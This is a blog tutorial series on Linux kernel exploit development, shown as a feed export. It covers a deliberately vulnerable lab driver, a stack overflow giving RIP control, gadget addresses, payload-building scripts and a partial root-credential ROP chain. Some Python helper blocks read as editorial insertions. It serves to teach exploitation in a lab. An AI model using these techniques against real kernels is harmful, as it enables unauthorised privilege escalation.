tag:blogger.com,1999:blog-58456713138679062742024-03-12T16:29:51.594-07:00k3170"So you are interpreters of interpreters?" - Socrates, Ion by PlatoKeith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.comBlogger100125tag:blogger.com,1999:blog-5845671313867906274.post-14957687828966403312021-01-18T06:04:00.003-08:002021-01-18T06:05:51.531-08:00[Linux Kernel Exploitation 0x2] Controlling RIP and Escalating privileges via Stack Overflow<p><b>Previous Post in Series</b>:<br /></p><ol><li><b>[Linux Kernel Exploitation 0x0]</b> Debugging the Kernel with QEMU <a href="https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html">https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html</a></li><li><b>[Linux Kernel Exploitation 0x1] </b>Smashing Stack Overflows in the Kernel <a href="https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.html">https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.html</a></li><li>this post <br /></li></ol><div>Hi folks! I'm back, and this time I've got a banger of a post: we're going to tackle the last part of the exploit chain for stack overflows. In the previous post we discussed some details of memory protections in the kernel and looked at what a few probes around some of the memory structures looked like. If you don't know how to debug a Linux kernel, build one, or build a QEMU image, please check out the previous posts in the series. 
In this post we're going to really start wielding our power over the stack, crafting ROP chains and calls to some interesting functions.</div><div><br /></div><h2 style="text-align: left;">Controlling RIP (No Canary)<br /></h2><div><br /></div><div>Target Driver: <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/debug_driver.c">https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/debug_driver.c</a> <br /></div><div><br /></div><div>The last time we discussed canaries, we turned off <span style="font-family: courier;">CONFIG_STACKPROTECTOR </span>and looked at the stack to confirm there was absolutely no protection. What I did after that, behind the scenes, was check whether <span style="font-family: courier;">VMAP_STACK </span>had any significant impact, because initially my writes were triggering a ton of page faults! After that I made an adjustment to the driver: I changed <span style="font-family: courier;">target_buf </span>to a fixed-size char buffer, "<span style="font-family: courier;">char target[16]</span>". This made my stack smashing much more reliable, so again I implore you to use the target driver for the following set of examples.</div><div> </div><div>First, let's find the length at which we start overwriting the return address, i.e. the value that ends up in RIP. This is not the most rigorous method, but to keep things simple my procedure was: <i>increase the write length one byte at a time, check what kind of error is triggered, and then place a taint value like <span style="font-family: courier;">0x43434343 </span>at the end of the payload to see whether it ends up in any registers or other interesting places when a fault is triggered. 
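A common alternative to growing the payload one byte at a time (this is a swapped-in technique, not the method used in this post) is to send a cyclic de Bruijn pattern, in which every 8-byte window is unique, and then look up where the faulting value sits in it. The sketch below assumes a lowercase-letter alphabet, which also keeps NUL bytes out of the argv string; the helper names are hypothetical. One caveat: a pattern value such as 0x6161616161616161 is non-canonical, and returning to a non-canonical address typically makes the ret itself fault, so you would read the qword at RSP in the fault report rather than RIP.

```python
import itertools


def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield symbol indices of a de Bruijn sequence B(len(alphabet), n):
    every n-symbol window appears exactly once (cyclically)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                yield from a[1:p + 1]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 8) -> bytes:
    """First `length` bytes of a pattern whose n-byte windows are all unique."""
    alphabet = b"abcdefghijklmnopqrstuvwxyz"
    return bytes(alphabet[i] for i in itertools.islice(de_bruijn(alphabet, n), length))


def find_offset(pattern: bytes, value: int) -> int:
    """Offset of the 8 bytes that ended up in RIP (or at [rsp]), given the
    value as GDB prints it; -1 if it is not part of the pattern."""
    return pattern.find(value.to_bytes(8, "little"))
```

For example, pass the bytes of cyclic(100) to ./stacksmash_app.elf instead of a run of "A"s, then hand the 8-byte value from the crash to find_offset. With this driver it should agree with the offset found by hand.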
</i></div><div> </div><div>Eventually this laborious process showed that 48 bytes of filler come before the bytes that cleanly overwrite the saved RIP value, as this nifty screenshot demonstrates:</div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHTcLryIDMRtNf7aS4sO9o2-pMMjUAZm_ZCvHx4mW7-RLu63wJuRJv0MTLksADdun8aj_N65yKWppvh55jGnMM1eyEf8B4gWtHfrBt1iDcuP7oFLApbb8Cym2k11g9oUiYLcLaZym7Ss/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="404" data-original-width="1358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHTcLryIDMRtNf7aS4sO9o2-pMMjUAZm_ZCvHx4mW7-RLu63wJuRJv0MTLksADdun8aj_N65yKWppvh55jGnMM1eyEf8B4gWtHfrBt1iDcuP7oFLApbb8Cym2k11g9oUiYLcLaZym7Ss/s16000/RIP_Control-2020-11-29+00-40-11.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">GDB output showing that an address from our payload is actually executed in the kernel! 
We officially control execution woo hoo!<br /></td></tr></tbody></table><br /><br /></div><div>For those who want to recreate this using the stuff I set up for the test, you'll need to fire off this command, making sure your module is loaded and accessible:</div><div><br /></div><div><span style="font-family: courier;">./stacksmash_test_addr.sh 48 [address to execute]</span></div><div><br /></div><div>And if you want to see what ./stacksmash_test_addr.sh does, it's very simple: it takes a payload length and a hexadecimal address as input, builds a payload of that many "A"s followed by the address bytes in little-endian order, and passes it to stacksmash_app.elf. Here's the code:</div><div><br /></div><div><code> <span style="font-size: small;"><span style="font-family: courier;">./stacksmash_app.elf <span class="sb">`</span>python2 <span class="nt">-c</span> <span class="s1">'\</span></span></span></code></div><div><span style="font-size: small;"><span style="font-family: courier;"><code><span class="s1">import sys;</span></code></span></span></div><div><span style="font-size: small;"><span style="font-family: courier;"><code><span class="s1">address=sys.argv[2];</span></code></span></span></div><div><span style="font-size: small;"><span style="font-family: courier;"><code><span class="s1">address_string="".join([chr(int(address[2:][i:i+2],16)) for i in range(0,len(address[2:])+2,2) if len(address[2:][i:i+2]) != 0][::-1]);print("A"*int(sys.argv[1])+address_string)'</span> <span class="nv">$LENGTH</span> <span class="nv">$ADDR</span><span class="sb">`</span> 10</code></span></span></div><div><br /></div><div><i>I've tried to clean it up a bit, but honestly all I'm doing here is some ugly Python 2 (where <span style="font-family: courier;">chr()</span> yields raw bytes) to convert a hexadecimal address into a format that ends up in memory properly. 
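If only Python 3 is available, the same conversion can be done with bytes.fromhex. In Python 3, chr() plus print() would emit UTF-8 for values above 0x7f instead of the raw bytes. This is a rough sketch, not the author's script, and the file name build_payload.py is hypothetical.

```python
#!/usr/bin/env python3
# build_payload.py (hypothetical name): a Python 3 take on the conversion in
# stacksmash_test_addr.sh. Writes 'A' * LENGTH followed by ADDR's bytes in
# reverse (little-endian) order, as raw bytes with no trailing newline.
import sys


def build_payload(length: int, address: str) -> bytes:
    """`address` is a hex string, optionally 0x-prefixed, with an even number
    of digits. Several 64-bit addresses may be concatenated; because the
    whole string is reversed, the LAST address lands first in memory."""
    digits = address[2:] if address.lower().startswith("0x") else address
    return b"A" * length + bytes.fromhex(digits)[::-1]


if __name__ == "__main__" and len(sys.argv) == 3:
    sys.stdout.buffer.write(build_payload(int(sys.argv[1]), sys.argv[2]))
```

Usage would look like ./stacksmash_app.elf "$(python3 build_payload.py 48 0xffffffff8124529d)" 10. As with the original, the payload goes through the shell and argv, so it cannot carry NUL bytes.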
It's not crucial to understand everything that happens here, because there are much less complicated ways to achieve this; I'm just going for the most straightforward approach possible so everyone can participate without needing much background in kernel dev. </i><br /></div><div><br /></div><div>In the above screenshot, note that the breakpoint is set on a function unusual enough that we know it is our payload triggering its execution (<i>because it may happen that you get all happy about triggering a ROP payload when it's just natural kernel noise hehe</i>). Congratulations, you just controlled execution at one of the highest privilege levels available to a human being (<i>on a Linux computer</i>)! Fancy stuff! The next step is to start chaining together instructions that achieve a goal we want. <br /></div><div><br /></div><div><h2 style="text-align: left;">Privilege Escalation for Kernel Intruders<br /></h2></div><div><br /></div><div>Before we do that, let's lay out a game plan. There are any number of things we can do with these newly gained kernel powers, but let's try something simple: get root creds. What we need is for the kernel to make our userland process insta-root! It turns out there are functions in the kernel symbol table that do exactly that:</div><div><ul style="text-align: left;"><li><span style="font-family: courier;"><a href="https://elixir.bootlin.com/linux/latest/source/kernel/cred.c#L666">prepare_kernel_cred(struct task_struct *daemon)</a></span> is a function that generates a <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/cred.h#L111">cred </a>structure. We need this for our call to the next important function. 
I know it takes a weird <span style="font-family: courier;">task_struct </span>thing, but fret not: the kernel-doc comment says it can be NULL, in which case the credentials are set to 0 (root) with full capabilities, i.e. "full creds".</li><li><span style="font-family: courier;"><a href="https://elixir.bootlin.com/linux/latest/source/kernel/cred.c#L423">commit_creds(struct cred *)</a></span> does the actual deed and installs the cred structure on the current task.</li></ul><div>So we need a Return Oriented Programming (ROP) chain that performs the call <span style="font-family: courier;">commit_creds(prepare_kernel_cred(0))</span>, which in terms of assembler instructions means we need:</div></div><div><ul style="text-align: left;"><li>an instruction chain that puts a NULL in <span style="font-family: courier;">rdi </span>before we call <span style="font-family: courier;">prepare_kernel_cred</span>, because under the System V AMD64 calling convention <span style="font-family: courier;">rdi </span>holds the first parameter.</li><li>an instruction chain that grabs the returned cred structure (<i>which will be a pointer in <span style="font-family: courier;">rax </span>at this point</i>) and moves it into <span style="font-family: courier;">rdi </span>before our call to <span style="font-family: courier;">commit_creds</span>.</li></ul><div>Beyond this there's also the problem of leaving the realm of the kernel to enjoy your newfound powers in middle earth. Luckily for us there are a couple of methods one can use to leave, each requiring something different of the stack and register state. 
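To make the register flow of this plan concrete, here is a toy Python model of the chain for commit_creds(prepare_kernel_cred(0)). It is not an exploit. Every address is a hypothetical placeholder, not a gadget from any real kernel build. The mov rdi, rax ; ret gadget is assumed to exist cleanly, and real kernels may only offer noisier variants. The two kernel functions are stubbed. The model only shows how each ret pops the next 8-byte stack slot into RIP.

```python
# Toy model of the planned ROP chain; all addresses are HYPOTHETICAL placeholders.
POP_RDI_RET = 0xFFFFFFFF81000001         # pop rdi ; ret
MOV_RDI_RAX_RET = 0xFFFFFFFF81000002     # mov rdi, rax ; ret (assumed to exist)
PREPARE_KERNEL_CRED = 0xFFFFFFFF81000100
COMMIT_CREDS = 0xFFFFFFFF81000200
DONE = 0xFFFFFFFF81000300                # stand-in for the return-to-userland step
FAKE_CRED = 0xFFFF888000C0FFEE           # value our stubbed prepare_kernel_cred returns


def build_chain() -> list:
    """Stack slots placed right after the 48 bytes of padding."""
    return [
        POP_RDI_RET, 0,        # rdi = NULL
        PREPARE_KERNEL_CRED,   # rax = prepare_kernel_cred(NULL)
        MOV_RDI_RAX_RET,       # rdi = rax
        COMMIT_CREDS,          # commit_creds(rdi)
        DONE,
    ]


def simulate(chain: list) -> list:
    """Walk the chain as successive `ret`s would; return the calls made."""
    regs = {"rdi": None, "rax": None}
    calls = []
    rsp = 0
    while True:
        rip = chain[rsp]       # ret: pop the next slot into RIP
        rsp += 1
        if rip == POP_RDI_RET:
            regs["rdi"] = chain[rsp]
            rsp += 1
        elif rip == MOV_RDI_RAX_RET:
            regs["rdi"] = regs["rax"]
        elif rip == PREPARE_KERNEL_CRED:
            calls.append(("prepare_kernel_cred", regs["rdi"]))
            regs["rax"] = FAKE_CRED
        elif rip == COMMIT_CREDS:
            calls.append(("commit_creds", regs["rdi"]))
            regs["rax"] = 0
        elif rip == DONE:
            return calls
        else:
            raise ValueError(f"unknown slot {rip:#x}")


def serialize(chain: list, padding: int = 48) -> bytes:
    """Padding followed by each slot as a little-endian 64-bit value."""
    return b"A" * padding + b"".join(slot.to_bytes(8, "little") for slot in chain)
```

Note the literal 0 slot. It serializes to eight NUL bytes, which will not survive being passed as a command-line string. With the argv-based app, that slot would need another approach.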
</div><div> </div><div>We'll address this once our ROP chain is almost complete. So in summary, our plan so far is:</div><div><ol style="text-align: left;"><li><b>RIP Control:</b> Find a write length that controls RIP. <br /></li><li><b>ROP Chain:</b> Build a ROP chain that calls <span style="font-family: courier;">commit_creds(prepare_kernel_cred(0))</span>.</li><li><b>Return2Userland:</b> Exit the kernel safely using iretq, sysretq, etc. <br /></li></ol></div><div>Our overall plan will vary slightly depending on which stack protections are enabled; for now, let's keep it simple. <br /></div><div style="text-align: left;"><h2 style="text-align: left;">Building a ROP chain</h2></div><div> </div><div>We need a tool that will find ROP-friendly instruction sequences (gadgets) in the kernel image. I relied on <a href="https://github.com/JonathanSalwan/ROPgadget"><span style="font-family: courier;">ROPgadget.py</span></a>; it gets the job done, although I'm sure there are tons of other tools that can handle this. 
Here I'm dumping ROP gadgets for the kernel I'm attacking (Linux 5.9.1):</div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2R2kiaXvJ7tIhFwbmxC9__kW84lvFX3QyMlpvEwCYhHR6mUX_jWqrUFD3TnTYgcP0njPicUad8ECkKefNrjx5VwtsjSk2V3rzltX0oGW6lo4pnlMXdh0F9G4HbA3jp1nezKncbWY6Ub4/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="207" data-original-width="927" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2R2kiaXvJ7tIhFwbmxC9__kW84lvFX3QyMlpvEwCYhHR6mUX_jWqrUFD3TnTYgcP0njPicUad8ECkKefNrjx5VwtsjSk2V3rzltX0oGW6lo4pnlMXdh0F9G4HbA3jp1nezKncbWY6Ub4/s16000/Screenshot+from+2020-12-01+02-47-48.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Screenshot of some ROPgadget.py output after being run on the vmlinux image for our target kernel.<br /></td></tr></tbody></table><br /><br /></div><div>Okay, so we need to pick up a couple of gadgets. 
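Picking gadgets out of a large dump by eye gets tedious, so a small filter over saved ROPgadget.py output can help. The sketch below assumes the output was saved with something like ROPgadget.py --binary vmlinux > gadgets.txt. It also assumes gadget lines look like 0xffffffff8124529d : pop rbx ; ret. Matching the instruction sequence exactly skips noisier variants, such as ones ending in ret 0x10, which pop extra bytes off the stack. The script name in the usage comment is hypothetical.

```python
import re
import sys

# Assumed gadget line format: "0xffffffff8124529d : pop rbx ; ret"
LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+) : (.+)$")


def parse_gadgets(lines):
    """Yield (address, [instruction, ...]) for each gadget line; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(1), 16), [i.strip() for i in m.group(2).split(";")]


def find_exact(lines, wanted: str) -> list:
    """Addresses whose instruction sequence is exactly `wanted`, e.g. "pop rbx ; ret"."""
    target = [i.strip() for i in wanted.split(";")]
    return [addr for addr, insns in parse_gadgets(lines) if insns == target]


if __name__ == "__main__" and len(sys.argv) == 3:
    # Usage: python3 find_gadget.py gadgets.txt "pop rbx ; ret"
    with open(sys.argv[1]) as f:
        for addr in find_exact(f, sys.argv[2]):
            print(f"{addr:#x}")
```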
To start, let's set up a little gadget chain that calls any function pointer we place on the stack. Here are my candidates:</div><div><ul style="text-align: left;"><li><span style="font-family: courier;">0xffffffff8124529d <b>pop rbx ; ret</b><br /></span></li><li><span style="font-family: courier;">0xffffffff8230f2ff <b>call rbx</b> </span></li></ul><p>Using these gadgets means we want to pop something into rbx, which requires us to have that something on the stack. For us this means packing in the address of <span style="font-family: courier;">prepare_kernel_cred</span>, so the layout looks basically like this: </p><p><span style="font-family: courier;">[AAA...*48][</span><span style="font-family: courier;">0xffffffff8124529d][</span><span style="font-family: courier;">prepare_kernel_cred][</span><span style="font-family: courier;">0x</span><span style="font-family: courier;"><span style="font-family: courier;">ffffffff8230f2ff</span>]</span></p>Okay, so we need to somehow use <span style="font-family: courier;">./stacksmash_test_addr.sh</span> to pack several addresses into the payload. I've tried more sophisticated ways and they are currently failing, so I've decided to stick with this clunky script for now. Because the script reverses the whole hex string byte by byte, you concatenate the addresses in reverse order: the last address in the string ends up first in memory. Call <span style="font-family: courier;">stacksmash_test_addr.sh</span> as follows:</div><div> </div><div><span style="font-family: courier;">./stacksmash_test_addr.sh 48 </span><span style="font-family: courier;"><span style="font-family: courier;">0x</span></span><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;">ffffffff8230f2ff</span>ffffffff81088be0</span></span><span style="font-family: courier;">ffffffff8124529d</span></div><div></div><div></div><div> </div><div>This is going to prove a little tricky because of the default terminal line size in QEMU, which I haven't figured out how to change yet; I'll update this once I do! 
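The same three-slot layout can be built with explicit 64-bit little-endian packing instead of one long concatenated hex string. In this sketch the gadget addresses are the ones listed above for the author's 5.9.1 build. The value 0xffffffff81088be0 is the address passed in the prepare_kernel_cred slot of the command above. On your kernel, all three will differ.

```python
PADDING = 48                           # filler before the saved return address
POP_RBX_RET = 0xFFFFFFFF8124529D       # pop rbx ; ret
PREPARE_KERNEL_CRED = 0xFFFFFFFF81088BE0
CALL_RBX = 0xFFFFFFFF8230F2FF          # call rbx


def build_payload(chain: list, padding: int = PADDING) -> bytes:
    """'A' * padding followed by each slot as a little-endian 64-bit value."""
    return b"A" * padding + b"".join(slot.to_bytes(8, "little") for slot in chain)


payload = build_payload([POP_RBX_RET, PREPARE_KERNEL_CRED, CALL_RBX])

# Same bytes as the hex-string trick: reversing the concatenated string
# puts the LAST address first in memory.
hex_trick = bytes.fromhex("ffffffff8230f2ff" "ffffffff81088be0" "ffffffff8124529d")[::-1]
assert payload == b"A" * PADDING + hex_trick
# argv strings end at the first NUL byte, so the payload must not contain one.
assert b"\x00" not in payload
```

One design point to keep in mind: call rbx pushes its own return address. When prepare_kernel_cred returns, execution therefore resumes at whatever instruction follows the call rbx gadget in the kernel image, not at the next slot of our payload.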
Anyway, if you get this right, the following is what should end up on your stack:</div><div> </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihhll3z8woIM5O4WGl42DpmaRe96WfaGb4U9VWpuRtdkhKX7kLJ5IT7JUiqgXnxVC-jFzUFgyvlHN14ofZndwXgQDWvPmXMUb-ACVaiLvbUz1lVJWMKeY3ze8CrVMYdbvPpT-fKogx1d8/s704/stacksmash_test_addr-confirmed-payload.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="528" data-original-width="704" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihhll3z8woIM5O4WGl42DpmaRe96WfaGb4U9VWpuRtdkhKX7kLJ5IT7JUiqgXnxVC-jFzUFgyvlHN14ofZndwXgQDWvPmXMUb-ACVaiLvbUz1lVJWMKeY3ze8CrVMYdbvPpT-fKogx1d8/s16000/stacksmash_test_addr-confirmed-payload.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Some GDB output confirming that we are actually building a sane payload. 
Here I grab the address of the buf parameter from a kernel-mediated call to vfs_write; this makes sure I'm looking at the correct buffer before the driver touches it.<br /></td></tr></tbody></table><div><br /></div><div><p>And if you manage to actually run the sample payload, you should hit breakpoints that indicate you're in control:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfCMY75yDpGrSeThIamSACpuuya5gv6qXO9EcpvJy8EFOP6HLW46-MFHWiEhhblShiYTkuXe_pWr23KtlUBEQQE88cB_4WFuiiKo9ISRH7xF2QuQKSReN9tmRp8qDCTg6hjRQt0KD8GJY/s811/stacksmash_test_addr-confirmed-breakpoints.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="811" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfCMY75yDpGrSeThIamSACpuuya5gv6qXO9EcpvJy8EFOP6HLW46-MFHWiEhhblShiYTkuXe_pWr23KtlUBEQQE88cB_4WFuiiKo9ISRH7xF2QuQKSReN9tmRp8qDCTg6hjRQt0KD8GJY/s16000/stacksmash_test_addr-confirmed-breakpoints.png" /></a></div><br /><p></p><p>That confirms we are hitting the right notes, and we can now call pretty much any function with this neat little gadget! What we need to do next is prepare a ROP chain that sticks a NULL in <span style="font-family: courier;">rdi </span>before we make the call to <span style="font-family: courier;">prepare_kernel_cred</span>. <i>A note on choosing gadgets: I would prioritize those that cause the least stack drama (watch out for ret instructions with an immediate operand, which pop extra bytes off the stack after the return address) and that affect as few registers as possible. But I suggest just trying stuff; you actually learn a lot from seeing gadgets not work!</i></p><p><i> </i></p><p>I've been stuck at this point for a few weeks, so I'm going to cut my losses and end this post here; we'll prepare the rest of the payload in the next post. Enjoy! 
<i> <br /></i></p><br /></div></div><h2 style="text-align: left;">Reading and References</h2><div><ul style="text-align: left;"><li><a href="https://memto.github.io/linux/program/2018/09/21/linux-kernel-rop-example/">https://memto.github.io/linux/program/2018/09/21/linux-kernel-rop-example/</a> </li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/</a></li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-2/">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-2/</a></li><li><a href="https://www.felixcloutier.com/x86/iret:iretd">https://www.felixcloutier.com/x86/iret:iretd</a></li></ul></div><div><br /></div><div><br /></div><p></p>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com1tag:blogger.com,1999:blog-5845671313867906274.post-83557821615199324892020-11-27T07:29:00.006-08:002020-11-28T04:47:12.729-08:00[Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel <div class="separator" style="clear: both; text-align: center;"><br /></div><p><b>Previous Post in Series</b>:<br /></p><ol style="text-align: left;"><li>[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU <a href="https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html">https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html</a> </li></ol><p>Hi folks, this blog post is part of a series in which I run through some of the basics of kernel exploit development for Linux. 
I've started off the series with a walkthrough of how to set up your kernel for debugging, and included a simple debug driver to target. This post carries on from that point and explores some stack security paradigms in the kernel.</p><p>We're gonna add some stuff to that driver to make it do a dangerous memcpy and then look at whether we can manipulate memory structures with our input. I initially intended to cover a full exploit to a root shell in this post, but that proved a bit more challenging than I anticipated, so I'm splitting it into two posts. This one covers almost everything right up to actually controlling the instruction pointer in the kernel, along with a good amount of detail on kernel memory protections for the stack and how they work. So if you'd like to learn more about that, stay tuned! <br /></p><p> </p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgmwKOqV2XLZZukfFmx8o5G_StYNgaribd7q-yjs8YG4WcE5nSj8LULKQMPWp8MbCO4JmDwiivGhSQ7-GEaO0N8kc_gCUxf2McrEvzmFdG8E71Up0-WavUMdJA5OCAQodvo2k-_N8jFQ/s1848/stackcrash_ssh.gif" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1016" data-original-width="1848" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgmwKOqV2XLZZukfFmx8o5G_StYNgaribd7q-yjs8YG4WcE5nSj8LULKQMPWp8MbCO4JmDwiivGhSQ7-GEaO0N8kc_gCUxf2McrEvzmFdG8E71Up0-WavUMdJA5OCAQodvo2k-_N8jFQ/s16000/stackcrash_ssh.gif" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">gif
showing the correlation between crashes that trigger a kernel fault
(every time ssh connects). One can see the register data includes our
payload! This was actually a heap overflow, not a stack-based overflow,
oops!<br /></td></tr></tbody></table><p> </p><h2 style="text-align: left;">Getting Set Up<br /></h2><p>We're going to progress through this just like any other stack smashing tutorial. I'm going to show you some vulnerable code, then we're going to experiment with some payload lengths until we get a crash, and take it from there. </p><p> To do that we need to make sure we can actually trigger the vulnerable code, and that means:</p><ol style="text-align: left;"><li>Having <b>a driver</b> script (<i>one that invokes the kernel functionality from userspace</i>).<br /></li><li>Having a <b>kernel hooked </b>up to a debugger in a relaunchable VM with debug symbols and all the other configs we need (<i>I explain how to achieve this in the previous post</i>).</li><li>Having enough <b>GDB fu </b>to: (1) set a breakpoint, and (2) inspect the stack and register values. If you want to follow along like a champ, I suggest pausing here and getting that done: learn to do those two things and then move on.</li></ol><p><i>*In the next few paragraphs I show you how to set a breakpoint in the
kernel and inspect stack memory. Because I lost this copy of the driver
and don't want to keep multiple copies of the same code, please treat
these as demonstrations and try to recreate them on the
version of the driver that wasn't lost.</i> <br /></p><p>Okay, if that's in place, we can set up our debugger just as we did in the previous post, except this time we want a setup that allows us to inspect the stack so we can actually see what our input is doing to memory. To achieve this we first need to hit the write function, then look for a more precise breakpoint location so we can conveniently peek at the stack without too much effort. Let's start with a breakpoint at the beginning of the device write function (<i>the one that does that dangerous copy_from_user*</i>); for us that's called <span style="font-family: courier;">stacksmash_dev_write</span>. Here's a quick reminder of how to get that going:</p><p> </p><p style="text-align: left;"><span style="font-family: courier;">root@syskaller: <b>cat /proc/modules</b> <i>[grab base address]</i> </span><span style="font-family: courier;"> </span></p><p style="text-align: left;"><span style="font-family: courier;">(gdb) <b>add-symbol-file </b><i>[PATH]</i><b>stacksmash_driver.ko</b> </span><i><span style="font-family: courier;">[base]</span></i><span style="font-family: courier;"> </span></p><p style="text-align: left;"><span style="font-family: courier;">(gdb) <b>break stacksmash_dev_write</b></span><br /></p><div><div><p> <span></span><span><span></span><span></span><span></span><span style="font-family: courier;">Breakpoint 2 at 0x10: stacksmash_dev_write. (2 locations)</span></span></p><p><span><span style="font-family: courier;"> </span></span></p><p>For those who need a recap, "add-symbol-file" loads symbols from the specified object file at the given address, so we have more semantic information while debugging<i>. </i>Next we set a simple breakpoint at <span style="font-family: courier;">stacksmash_dev_write</span>. <br /><i></i></p><p><i>* In case you haven't read the code or don't know what the module does, it's a pretty straightforward ioctl module with a write and read operation. 
It's based on the driver used in the previous post; the only difference is that the write does a copy_from_user without checking the incoming length.</i></p><p>Cool, now we need to trigger the function. To do that we invoke the stacksmash_app.elf binary from our QEMU target: we ssh into the instance, build the app ELF, load the module, and launch it as follows:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$ cd [kernel_dir]/image/; ssh -v -i ./stretch.id_rsa -p 10021 root@localhost -o "StrictHostKeyChecking no"</span></p><p><span style="font-family: courier;">... </span><br /></p><p><span style="font-family: courier;">root@syskaller: cd /home/</span><br /><span style="font-family: courier;"><span style="font-family: courier;">root@syskaller: gcc -o stacksmash_app.elf stacksmash_app.c</span></span><br /><span style="font-family: courier;"><span style="font-family: courier;">root@syskaller: insmod stacksmash_driver.ko</span></span><br /><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;">root@syskaller: ./stacksmash_app.elf "aaaaaaaa" 10</span></span></span></span></p><p><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;"> </span></span></span></span></p><p>If all is well you should hit a breakpoint like so:</p><p><span style="font-family: courier;">(gdb) c<br />Continuing.<br /><br /><b>Thread 1 hit Breakpoint 2, stacksmash_dev_write </b>(filep=0xffff88806bc30640, <br /> buffer=0x9 <fixed_percpu_data+9> <error: Cannot access memory at address 0x9>, <br /> len=140726537215640, offset=0xffffc9000049feb8)<br /> at drivers/stacksmash//stacksmash_driver.c:96<br /></span><br /></p><p>This means we are now in a comfortable position to track down better breakpoints. 
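The first step of the setup above can be scripted: read the module's base address from /proc/modules and feed it to add-symbol-file. The sketch below assumes the usual /proc/modules layout (name, size, refcount, dependencies, state, address). As in this post, it also assumes the module base is the address to give add-symbol-file. /sys/module/stacksmash_driver/sections/.text is another place to look. The address may show as zero without sufficient privileges (see kptr_restrict). The helper and script names are hypothetical.

```python
import sys


def module_base(proc_modules_text: str, name: str) -> int:
    """Load address of module `name`, taken from the sixth /proc/modules field."""
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0] == name:
            return int(fields[5], 16)
    raise KeyError(f"module {name!r} not found")


def add_symbol_file_cmd(ko_path: str, base: int) -> str:
    """The gdb command that loads the module's symbols at `base`."""
    return f"add-symbol-file {ko_path} {base:#x}"


if __name__ == "__main__" and len(sys.argv) == 3:
    # Usage inside the VM: python3 modbase.py stacksmash_driver stacksmash_driver.ko
    # (adjust the .ko path to wherever the module lives on the gdb host)
    with open("/proc/modules") as f:
        base = module_base(f.read(), sys.argv[1])
    print(add_symbol_file_cmd(sys.argv[2], base))
```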
